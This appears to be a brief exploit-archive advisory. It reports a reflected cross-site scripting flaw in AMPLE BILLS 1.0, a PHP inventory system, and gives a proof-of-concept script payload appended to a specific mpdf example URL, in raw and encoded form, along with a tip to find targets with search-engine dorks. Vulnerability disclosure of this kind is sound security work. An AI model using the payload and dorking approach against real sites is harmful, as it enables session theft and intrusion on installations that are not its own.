Headline
AMPLE BILLS 1.0 Cross Site Scripting
AMPLE BILLS version 1.0 suffers from a cross site scripting vulnerability.
=============================================================================================================================================| # Title : AMPLE BILLS v1.0 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) || # Vendor : https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : app/invoice/mpdf/examples/formsubmit.php?1<ScRiPt>prompt(913011)</ScRiPt>[+] http://localhost/ample/app/invoice/mpdf/examples/formsubmit.php?1%3CScRiPt%3Eprompt(913011)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================